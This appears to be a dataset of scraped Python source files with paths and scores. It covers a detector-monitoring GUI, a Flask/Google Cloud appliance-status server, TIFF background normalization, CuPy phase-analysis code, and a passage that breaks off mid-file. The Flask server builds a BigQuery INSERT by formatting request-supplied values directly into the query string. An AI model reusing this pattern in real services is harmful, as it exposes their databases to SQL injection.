service_record_widget.showGrid(y=True) dock_service_records.addWidget(service_record_widget) hit_timing_widget = pg.PlotWidget() self.hit_timing_plot = hit_timing_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) hit_timing_widget.showGrid(y=True) dock_hit_timing.addWidget(hit_timing_widget) self.plot_delay = 0 def deserialze_data(self, data): return jsonapi.loads(data, object_hook=utils.json_numpy_obj_hook) def handle_data(self, data): def update_rate(fps, hps, recent_total_hits, eps, recent_total_events): self.rate_label.setText("Readout Rate\n%d Hz" % fps) if self.spin_box.value() == 0: # show number of hits, all hits are integrated self.hit_rate_label.setText("Total Hits\n%d" % int(recent_total_hits)) else: self.hit_rate_label.setText("Hit Rate\n%d Hz" % int(hps)) if self.spin_box.value() == 0: # show number of events self.event_rate_label.setText("Total Events\n%d" % int(recent_total_events)) else: self.event_rate_label.setText("Event Rate\n%d Hz" % int(eps)) if 'meta_data' not in data: self.occupancy_img.setImage(data['occupancy'][:, :, 0], autoDownsample=True) self.tot_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['tot_hist'], fillLevel=0, brush=(0, 0, 255, 150)) self.tdc_plot.setData(x=np.linspace(-0.5, 4096.5, 4097), y=data['tdc_counters'], fillLevel=0, brush=(0, 0, 255, 150)) self.event_status_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.service_record_plot.setData(x=np.linspace(-0.5, 31.5, 33), y=data['service_records_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.trigger_status_plot.setData(x=np.linspace(-0.5, 7.5, 9), y=data['trigger_error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.hit_timing_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['rel_bcid_hist'][:16], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) else: update_rate(data['meta_data']['fps'], data['meta_data']['hps'], data['meta_data']['total_hits'], data['meta_data']['eps'], data['meta_data']['total_events']) self.timestamp_label.setText("Data Timestamp\n%s" % time.asctime(time.localtime(data['meta_data']['timestamp_stop']))) self.scan_parameter_label.setText("Scan Parameters\n%s" % ', '.join('%s: %s' % (str(key), str(val)) for key, val in data['meta_data']['scan_parameters'].iteritems())) now = ptime.time() self.plot_delay = self.plot_delay * 0.9 + (now - data['meta_data']['timestamp_stop']) * 0.1 self.plot_delay_label.setText("Plot Delay\n%s" % 'not realtime' if abs(self.plot_delay) > 5 else "%1.2f ms" % (self.plot_delay * 1.e3))
silab_online_monitor/receiver/pybar_fei4.py
from online_monitor.receiver.receiver import Receiver from zmq.utils import jsonapi import numpy as np import time from PyQt4 import Qt import pyqtgraph as pg from pyqtgraph.Qt import QtCore, QtGui import pyqtgraph.ptime as ptime from pyqtgraph.dockarea import DockArea, Dock from online_monitor.utils import utils class PybarFEI4(Receiver): def setup_receiver(self): self.set_bidirectional_communication() # We want to change converter settings def setup_widgets(self, parent, name): dock_area = DockArea() parent.addTab(dock_area, name) # Docks dock_occcupancy = Dock("Occupancy", size=(400, 400)) dock_run_config = Dock("Run configuration", size=(400, 400)) dock_global_config = Dock("Global configuration", size=(400, 400)) dock_tot = Dock("Time over threshold values (TOT)", size=(400, 400)) dock_tdc = Dock("Time digital converter values (TDC)", size=(400, 400)) dock_event_status = Dock("Event status", size=(400, 400)) dock_trigger_status = Dock("Trigger status", size=(400, 400)) dock_service_records = Dock("Service records", size=(400, 400)) dock_hit_timing = Dock("Hit timing (rel. BCID)", size=(400, 400)) dock_status = Dock("Status", size=(800, 40)) dock_area.addDock(dock_global_config, 'left') dock_area.addDock(dock_run_config, 'above', dock_global_config) dock_area.addDock(dock_occcupancy, 'above', dock_run_config) dock_area.addDock(dock_tdc, 'right', dock_occcupancy) dock_area.addDock(dock_tot, 'above', dock_tdc) dock_area.addDock(dock_service_records, 'bottom', dock_occcupancy) dock_area.addDock(dock_trigger_status, 'above', dock_service_records) dock_area.addDock(dock_event_status, 'above', dock_trigger_status) dock_area.addDock(dock_hit_timing, 'bottom', dock_tot) dock_area.addDock(dock_status, 'top') # Status dock on top cw = QtGui.QWidget() cw.setStyleSheet("QWidget {background-color:white}") layout = QtGui.QGridLayout() cw.setLayout(layout) self.rate_label = QtGui.QLabel("Readout Rate\n0 Hz") self.hit_rate_label = QtGui.QLabel("Hit Rate\n0 Hz") self.event_rate_label = QtGui.QLabel("Event Rate\n0 Hz") self.timestamp_label = QtGui.QLabel("Data Timestamp\n") self.plot_delay_label = QtGui.QLabel("Plot Delay\n") self.scan_parameter_label = QtGui.QLabel("Scan Parameters\n") self.spin_box = Qt.QSpinBox(value=0) self.spin_box.setMaximum(1000000) self.spin_box.setSuffix(" Readouts") self.reset_button = QtGui.QPushButton('Reset') layout.addWidget(self.timestamp_label, 0, 0, 0, 1) layout.addWidget(self.plot_delay_label, 0, 1, 0, 1) layout.addWidget(self.rate_label, 0, 2, 0, 1) layout.addWidget(self.hit_rate_label, 0, 3, 0, 1) layout.addWidget(self.event_rate_label, 0, 4, 0, 1) layout.addWidget(self.scan_parameter_label, 0, 5, 0, 1) layout.addWidget(self.spin_box, 0, 6, 0, 1) layout.addWidget(self.reset_button, 0, 7, 0, 1) dock_status.addWidget(cw) # Connect widgets self.reset_button.clicked.connect(lambda: self.send_command('RESET')) self.spin_box.valueChanged.connect(lambda value: self.send_command(str(value))) # Run config dock self.run_conf_list_widget = Qt.QListWidget() dock_run_config.addWidget(self.run_conf_list_widget) # Global config dock self.global_conf_list_widget = Qt.QListWidget() dock_global_config.addWidget(self.global_conf_list_widget) # Different plot docks occupancy_graphics = pg.GraphicsLayoutWidget() occupancy_graphics.show() view = occupancy_graphics.addViewBox() self.occupancy_img = pg.ImageItem(border='w') view.addItem(self.occupancy_img) view.setRange(QtCore.QRectF(0, 0, 80, 336)) dock_occcupancy.addWidget(occupancy_graphics) tot_plot_widget = pg.PlotWidget(background="w") self.tot_plot = tot_plot_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) tot_plot_widget.showGrid(y=True) dock_tot.addWidget(tot_plot_widget) tdc_plot_widget = pg.PlotWidget(background="w") self.tdc_plot = tdc_plot_widget.plot(np.linspace(-0.5, 4095.5, 4097), np.zeros((4096)), stepMode=True) tdc_plot_widget.showGrid(y=True) tdc_plot_widget.setXRange(0, 800, update=True) dock_tdc.addWidget(tdc_plot_widget) event_status_widget = pg.PlotWidget() self.event_status_plot = event_status_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) event_status_widget.showGrid(y=True) dock_event_status.addWidget(event_status_widget) trigger_status_widget = pg.PlotWidget() self.trigger_status_plot = trigger_status_widget.plot(np.linspace(-0.5, 7.5, 9), np.zeros((8)), stepMode=True) trigger_status_widget.showGrid(y=True) dock_trigger_status.addWidget(trigger_status_widget) service_record_widget = pg.PlotWidget() self.service_record_plot = service_record_widget.plot(np.linspace(-0.5, 31.5, 33), np.zeros((32)), stepMode=True) service_record_widget.showGrid(y=True) dock_service_records.addWidget(service_record_widget) hit_timing_widget = pg.PlotWidget() self.hit_timing_plot = hit_timing_widget.plot(np.linspace(-0.5, 15.5, 17), np.zeros((16)), stepMode=True) hit_timing_widget.showGrid(y=True) dock_hit_timing.addWidget(hit_timing_widget) self.plot_delay = 0 def deserialze_data(self, data): return jsonapi.loads(data, object_hook=utils.json_numpy_obj_hook) def handle_data(self, data): def update_rate(fps, hps, recent_total_hits, eps, recent_total_events): self.rate_label.setText("Readout Rate\n%d Hz" % fps) if self.spin_box.value() == 0: # show number of hits, all hits are integrated self.hit_rate_label.setText("Total Hits\n%d" % int(recent_total_hits)) else: self.hit_rate_label.setText("Hit Rate\n%d Hz" % int(hps)) if self.spin_box.value() == 0: # show number of events self.event_rate_label.setText("Total Events\n%d" % int(recent_total_events)) else: self.event_rate_label.setText("Event Rate\n%d Hz" % int(eps)) if 'meta_data' not in data: self.occupancy_img.setImage(data['occupancy'][:, :, 0], autoDownsample=True) self.tot_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['tot_hist'], fillLevel=0, brush=(0, 0, 255, 150)) self.tdc_plot.setData(x=np.linspace(-0.5, 4096.5, 4097), y=data['tdc_counters'], fillLevel=0, brush=(0, 0, 255, 150)) self.event_status_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.service_record_plot.setData(x=np.linspace(-0.5, 31.5, 33), y=data['service_records_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.trigger_status_plot.setData(x=np.linspace(-0.5, 7.5, 9), y=data['trigger_error_counters'], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) self.hit_timing_plot.setData(x=np.linspace(-0.5, 15.5, 17), y=data['rel_bcid_hist'][:16], stepMode=True, fillLevel=0, brush=(0, 0, 255, 150)) else: update_rate(data['meta_data']['fps'], data['meta_data']['hps'], data['meta_data']['total_hits'], data['meta_data']['eps'], data['meta_data']['total_events']) self.timestamp_label.setText("Data Timestamp\n%s" % time.asctime(time.localtime(data['meta_data']['timestamp_stop']))) self.scan_parameter_label.setText("Scan Parameters\n%s" % ', '.join('%s: %s' % (str(key), str(val)) for key, val in data['meta_data']['scan_parameters'].iteritems())) now = ptime.time() self.plot_delay = self.plot_delay * 0.9 + (now - data['meta_data']['timestamp_stop']) * 0.1 self.plot_delay_label.setText("Plot Delay\n%s" % 'not realtime' if abs(self.plot_delay) > 5 else "%1.2f ms" % (self.plot_delay * 1.e3))
0.478041
0.16654
import base64 import json import logging import os from flask import Flask from flask import request import googleapiclient.discovery import google.cloud.bigquery import google.cloud.pubsub_v1 logging.basicConfig(level=logging.DEBUG) PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT'] MODEL_NAME = os.environ['MODEL_NAME'] DATASET_ID = os.environ['DATASET_ID'] SEQ_LEN = int(os.environ['SEQ_LEN']) PUB_TOPIC = os.environ['PUB_TOPIC'] FEAT_COLS = ['ActivePower_{}'.format(i) for i in range(1, SEQ_LEN + 1)] app = Flask(__name__) ml_service = googleapiclient.discovery.build('ml', 'v1') bq_client = google.cloud.bigquery.Client() publisher = google.cloud.pubsub_v1.PublisherClient() topic_path = publisher.topic_path(PROJECT_ID, PUB_TOPIC) @app.route('/upload', methods=['POST']) def process_msg(): """Process the incoming request. Example of an incoming json message: { "message": {"data": {"timestamp": ["2018-10-30 00:00:00", ...], "power": [111.0, ...]}}, ... } The message is a json data, we should 1. write the json data to BQ 2. forward the json data to CMLE 3. write the prediction to BQ Returns: (str, int), message and HTTP code. """ try: envelope = json.loads(request.data.decode('utf-8')) payload = base64.b64decode(envelope['message']['data']) data = json.loads(payload, encoding='utf-8') time_stamp = data['timestamp'] active_power = data['power'] device_id = data['device_id'] logging.info('0. Got msg from device: {}'.format(device_id)) # forward the data to CMLE instance = {k:v for k, v in zip(FEAT_COLS, active_power)} response = ml_service.projects().predict( name='projects/{}/models/{}'.format(PROJECT_ID, MODEL_NAME), body={'instances': [instance]} ).execute() logging.info('1. CMLE returned: {}'.format(response)) preds = response['predictions'][0] probs = preds['probabilities'] # publish the result data = {'device_id': device_id, 'probs': probs, 'data': active_power, 'time': time_stamp} data = json.dumps(data).encode('utf-8') publisher.publish(topic_path, data=data) logging.info('2. Result published: {}'.format(data)) # write data to BQ query = ('INSERT INTO EnergyDisaggregation.ActivePower (time, device_id, power) ' 'VALUES (timestamp("{}"), "{}", {});'.format( time_stamp[-1], device_id, active_power[-1])) query_job = bq_client.query(query) _ = query_job.result() logging.info('3. Query executed: {}'.format(query)) # write CMLE result to BQ table_ref = bq_client.dataset(DATASET_ID).table('Predictions') table = bq_client.get_table(table_ref) rows_to_insert = [ (time_stamp[-1], device_id, i, int(prob > 0.5), prob) for i, prob in enumerate(probs) ] errors = bq_client.insert_rows(table, rows_to_insert) logging.info('4. Resultes recorded: {}'.format(rows_to_insert)) if errors: raise ValueError('{}'.format(errors)) # ack return 'OK', 200 except Exception as e: logging.info('Error: {}'.format(e)) return 'Error', 201 if __name__ == '__main__': app.run(host='127.0.0.1', port=8080)
examples/e2e-home-appliance-status-monitoring/server/main.py
import base64 import json import logging import os from flask import Flask from flask import request import googleapiclient.discovery import google.cloud.bigquery import google.cloud.pubsub_v1 logging.basicConfig(level=logging.DEBUG) PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT'] MODEL_NAME = os.environ['MODEL_NAME'] DATASET_ID = os.environ['DATASET_ID'] SEQ_LEN = int(os.environ['SEQ_LEN']) PUB_TOPIC = os.environ['PUB_TOPIC'] FEAT_COLS = ['ActivePower_{}'.format(i) for i in range(1, SEQ_LEN + 1)] app = Flask(__name__) ml_service = googleapiclient.discovery.build('ml', 'v1') bq_client = google.cloud.bigquery.Client() publisher = google.cloud.pubsub_v1.PublisherClient() topic_path = publisher.topic_path(PROJECT_ID, PUB_TOPIC) @app.route('/upload', methods=['POST']) def process_msg(): """Process the incoming request. Example of an incoming json message: { "message": {"data": {"timestamp": ["2018-10-30 00:00:00", ...], "power": [111.0, ...]}}, ... } The message is a json data, we should 1. write the json data to BQ 2. forward the json data to CMLE 3. write the prediction to BQ Returns: (str, int), message and HTTP code. """ try: envelope = json.loads(request.data.decode('utf-8')) payload = base64.b64decode(envelope['message']['data']) data = json.loads(payload, encoding='utf-8') time_stamp = data['timestamp'] active_power = data['power'] device_id = data['device_id'] logging.info('0. Got msg from device: {}'.format(device_id)) # forward the data to CMLE instance = {k:v for k, v in zip(FEAT_COLS, active_power)} response = ml_service.projects().predict( name='projects/{}/models/{}'.format(PROJECT_ID, MODEL_NAME), body={'instances': [instance]} ).execute() logging.info('1. CMLE returned: {}'.format(response)) preds = response['predictions'][0] probs = preds['probabilities'] # publish the result data = {'device_id': device_id, 'probs': probs, 'data': active_power, 'time': time_stamp} data = json.dumps(data).encode('utf-8') publisher.publish(topic_path, data=data) logging.info('2. Result published: {}'.format(data)) # write data to BQ query = ('INSERT INTO EnergyDisaggregation.ActivePower (time, device_id, power) ' 'VALUES (timestamp("{}"), "{}", {});'.format( time_stamp[-1], device_id, active_power[-1])) query_job = bq_client.query(query) _ = query_job.result() logging.info('3. Query executed: {}'.format(query)) # write CMLE result to BQ table_ref = bq_client.dataset(DATASET_ID).table('Predictions') table = bq_client.get_table(table_ref) rows_to_insert = [ (time_stamp[-1], device_id, i, int(prob > 0.5), prob) for i, prob in enumerate(probs) ] errors = bq_client.insert_rows(table, rows_to_insert) logging.info('4. Resultes recorded: {}'.format(rows_to_insert)) if errors: raise ValueError('{}'.format(errors)) # ack return 'OK', 200 except Exception as e: logging.info('Error: {}'.format(e)) return 'Error', 201 if __name__ == '__main__': app.run(host='127.0.0.1', port=8080)
0.410874
0.148726
import argparse import os import sys import tifffile.tifffile as tf import numpy as np _description = """Normalizes image stacks against background. Uses background.tif if it already exists in the current working directory; otherwise, computes the background image at each (x,y) location as the 5th percentile of that location's value over the image stack. """ def main(): parser = argparse.ArgumentParser(description=_description) parser.add_argument('--output', '-o', metavar='normalized.tif', default='normalized.tif', help='Output filename') parser.add_argument( '--subtract', action='store_true', help='Subtract background instead of dividing and truncating') parser.add_argument('infile') args = parser.parse_args() infile = args.infile print 'Reading image stack' t = tf.TiffFile(infile) ar = tf.stack_pages(t.pages) n = ar.shape[0] percentile = 0.01 if args.subtract else 0.05 if os.path.exists('background.tif'): print 'Reading background image' bg = tf.imread('background.tif') else: print 'Computing background image' sorted_ar = ar.copy() sorted_ar.sort(0) bg = sorted_ar[int(round(percentile*n, 0))] print 'Saving background image' tf.imsave('background.tif', bg) del sorted_ar print 'Performing background normalization' if not args.subtract: ar = ar.astype(np.double) for i in range(n): ar[i] /= bg print 'Converting to 16-bit TIFF' max_normed = (4095.0 / bg.min()) - 1 ar -= 1 ar *= 65535 ar /= max_normed ar = ar.round() else: ar = ar.astype(np.int16) for i in range(n): ar[i] -= bg ar[ar < 0] = 0 ar = ar.astype(np.uint16) print 'Writing normalized image' with tf.TiffWriter(args.output) as out: for i in range(n): if (i % 100) == 0: print i, sys.stdout.flush() out.save(ar[i]) print if __name__ == "__main__": main()
elisa/normalize_bg.py
import argparse import os import sys import tifffile.tifffile as tf import numpy as np _description = """Normalizes image stacks against background. Uses background.tif if it already exists in the current working directory; otherwise, computes the background image at each (x,y) location as the 5th percentile of that location's value over the image stack. """ def main(): parser = argparse.ArgumentParser(description=_description) parser.add_argument('--output', '-o', metavar='normalized.tif', default='normalized.tif', help='Output filename') parser.add_argument( '--subtract', action='store_true', help='Subtract background instead of dividing and truncating') parser.add_argument('infile') args = parser.parse_args() infile = args.infile print 'Reading image stack' t = tf.TiffFile(infile) ar = tf.stack_pages(t.pages) n = ar.shape[0] percentile = 0.01 if args.subtract else 0.05 if os.path.exists('background.tif'): print 'Reading background image' bg = tf.imread('background.tif') else: print 'Computing background image' sorted_ar = ar.copy() sorted_ar.sort(0) bg = sorted_ar[int(round(percentile*n, 0))] print 'Saving background image' tf.imsave('background.tif', bg) del sorted_ar print 'Performing background normalization' if not args.subtract: ar = ar.astype(np.double) for i in range(n): ar[i] /= bg print 'Converting to 16-bit TIFF' max_normed = (4095.0 / bg.min()) - 1 ar -= 1 ar *= 65535 ar /= max_normed ar = ar.round() else: ar = ar.astype(np.int16) for i in range(n): ar[i] -= bg ar[ar < 0] = 0 ar = ar.astype(np.uint16) print 'Writing normalized image' with tf.TiffWriter(args.output) as out: for i in range(n): if (i % 100) == 0: print i, sys.stdout.flush() out.save(ar[i]) print if __name__ == "__main__": main()
0.395484
0.213767
import numpy as np import cupy as cp import cupyx.scipy.ndimage as cpndi from .mathtools import wrapToPi def cuGPA(image, kvec, sigma=22): """Perform spatial lock-in on an image GPU version of `optGPA()`. Parameters ---------- image : np.array 2D image input image kvec : 2-tuple or array of float components of the reference k-vector sigma : float, default=22 standard deviation/ width of the Gaussian window Returns ------- res : np.array, dtype complex Complex lock-in signal. Same shape as `image`. Notes ----- This function should be a prime candidate to speed up using cupy. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] multiplier = cp.exp(np.pi*2j * (xx*kvec[0] + yy*kvec[1])) X = cp.fft.fft2(cp.asarray(image) * multiplier) res = cp.fft.ifft2(cpndi.fourier_gaussian(X, sigma=sigma)) return res def wfr2_grad_opt(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized version of wfr2_grad. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = {'w': cp.zeros(image.shape + (2,)), 'lockin': cp.zeros_like(c_image, dtype=np.complex128), 'grad': cp.zeros(image.shape + (2,)), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) g['w'] = cp.where(t[..., None], cp.array([wx, wy]), g['w']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['w'] = np.moveaxis(g['w'], -1, 0) g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def wfr2_grad_single(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized, single precision version of wfr2_grad. Single precision might be faster on some hardware. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image, dtype=np.float32) g = {'lockin': cp.zeros_like(c_image, dtype=np.complex64), 'grad': cp.zeros(image.shape + (2,), dtype=np.float32), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image, dtype=np.float32), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def cuwfr2_only_lockin(image, sigma, kvec, kw, kstep): """Optimized version of wfr2 calculating only the lock-in signal. Optimization in amount of computation done in each step by only computing updated values. """ kx, ky = kvec xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = cp.zeros_like(c_image, dtype=np.complex) gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g) g = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g) g = g.get() return g
pyGPA/cuGPA.py
import numpy as np import cupy as cp import cupyx.scipy.ndimage as cpndi from .mathtools import wrapToPi def cuGPA(image, kvec, sigma=22): """Perform spatial lock-in on an image GPU version of `optGPA()`. Parameters ---------- image : np.array 2D image input image kvec : 2-tuple or array of float components of the reference k-vector sigma : float, default=22 standard deviation/ width of the Gaussian window Returns ------- res : np.array, dtype complex Complex lock-in signal. Same shape as `image`. Notes ----- This function should be a prime candidate to speed up using cupy. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] multiplier = cp.exp(np.pi*2j * (xx*kvec[0] + yy*kvec[1])) X = cp.fft.fft2(cp.asarray(image) * multiplier) res = cp.fft.ifft2(cpndi.fourier_gaussian(X, sigma=sigma)) return res def wfr2_grad_opt(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized version of wfr2_grad. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = {'w': cp.zeros(image.shape + (2,)), 'lockin': cp.zeros_like(c_image, dtype=np.complex128), 'grad': cp.zeros(image.shape + (2,)), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) g['w'] = cp.where(t[..., None], cp.array([wx, wy]), g['w']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['w'] = np.moveaxis(g['w'], -1, 0) g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def wfr2_grad_single(image, sigma, kx, ky, kw, kstep, grad=None): """Optimized, single precision version of wfr2_grad. Single precision might be faster on some hardware. In addition to returning the used k-vector and lock-in signal, return the gradient of the lock-in signal as well, for each pixel computed from the values of the surrounding pixels of the GPA of the best k-vector. Slightly more accurate, determination of this gradient, as boundary effects are mitigated. """ xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image, dtype=np.float32) g = {'lockin': cp.zeros_like(c_image, dtype=np.complex64), 'grad': cp.zeros(image.shape + (2,), dtype=np.float32), } gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image, dtype=np.float32), sigma=sigma) if grad == 'diff': def grad_func(phase): dbdx = cp.diff(phase, axis=0, append=np.nan) dbdy = cp.diff(phase, axis=1, append=np.nan) return dbdx, dbdy elif grad is None: def grad_func(phase): return cp.gradient(phase) else: grad_func = grad for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g['lockin']) angle = -cp.angle(sf) grad = grad_func(angle) grad = cp.stack(grad, axis=-1) g['lockin'] = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g['lockin']) # TODO: do outside forloop. g['grad'] = cp.where(t[..., None], grad + 2*np.pi * cp.array([(wx-kx), (wy-ky)]), g['grad']) for key in g.keys(): g[key] = g[key].get() g['grad'] = wrapToPi(2 * g['grad']) / 2 return g def cuwfr2_only_lockin(image, sigma, kvec, kw, kstep): """Optimized version of wfr2 calculating only the lock-in signal. Optimization in amount of computation done in each step by only computing updated values. """ kx, ky = kvec xx, yy = cp.ogrid[0:image.shape[0], 0:image.shape[1]] c_image = cp.asarray(image) g = cp.zeros_like(c_image, dtype=np.complex) gaussian = cpndi.fourier_gaussian(cp.ones_like(c_image), sigma=sigma) for wx in np.arange(kx-kw, kx+kw, kstep): for wy in np.arange(ky-kw, ky+kw, kstep): multiplier = cp.exp(np.pi*2j * (xx*wx + yy*wy)) X = cp.fft.fft2(c_image * multiplier) X = X * gaussian sf = cp.fft.ifft2(X) t = cp.abs(sf) > cp.abs(g) g = cp.where(t, sf * cp.exp(-2j*np.pi*((wx-kx)*xx + (wy-ky)*yy)), g) g = g.get() return g
0.762601
0.590573
import numpy as np import numpy.ma as ma from math import hypot from filters import get_filters get_filters(globals()) # imports all filters at once def comp_range(blob): # compare rng-distant pixels within blob: a component of intra_blob rng = blob.rng + 1 p__ = ma.array(blob.dert__[:, :, 0], mask=~blob.map) # apply mask = ~map dy__ = ma.array(blob.dert__[:, :, 1], mask=~blob.map) dx__ = ma.array(blob.dert__[:, :, 2], mask=~blob.map) dert__ = ma.empty(shape=(height, width, 4), dtype=int) # initialize new dert__ comp_rng = rng * 2 # vertical comp: d__ = p__[comp_rng:, rng:-rng] - p__[:-comp_rng, rng:-rng] # bilateral comparison between p at coordinates (x, y + rng) and p at coordinates (x, y - rng) dy__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # horizontal comp: d__ = p__[rng:-rng, comp_rng:] - p__[rng:-rng, :-comp_rng] # bilateral comparison between p at coordinates (x + rng, y) and p at coordinates (x - rng, y) dx__[rng:-rng, rng:-rng] += d__ # bilateral accumulation on dy (x, y) # diagonal comparison: for xd in range(1, rng): yd = rng - xd # half y and x distance between comparands bi_xd = xd * 2 bi_yd = comp_rng - bi_xd # y and x distance between comparands hyp = hypot(bi_yd, bi_xd) y_coef = bi_yd / hyp # to decompose d into dy x_coef = bi_xd / hyp # to decompose d into dx # top-left and bottom-right quadrants: d__ = p__[bi_yd:, bi_xd:] - p__[:-bi_yd, :-bi_xd] # comparison between p (x - xd, y - yd) and p (x + xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # buffer for dy accumulation temp_dx__ = d__ * x_coef # buffer for dx accumulation # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) # top-right and bottom-left quadrants: d__ = p__[bi_yd:, :-bi_xd] - p__[:-bi_yd, bi_xd:] # comparison between p (x + xd, y - yd) and p (x - xd, y + yd) # decompose d to dy, dx: temp_dy__ = d__ * y_coef # buffer for dy accumulation temp_dx__ = -(d__ * x_coef) # buffer for dx accumulation, sign inverted with comp direction # accumulate dy, dx: dy__[yd:-yd, xd:-xd] += temp_dy__.astype(int) # bilateral accumulation on dy (x, y) dx__[yd:-yd, xd:-xd] += temp_dx__.astype(int) # bilateral accumulation on dx (x, y) g__ = 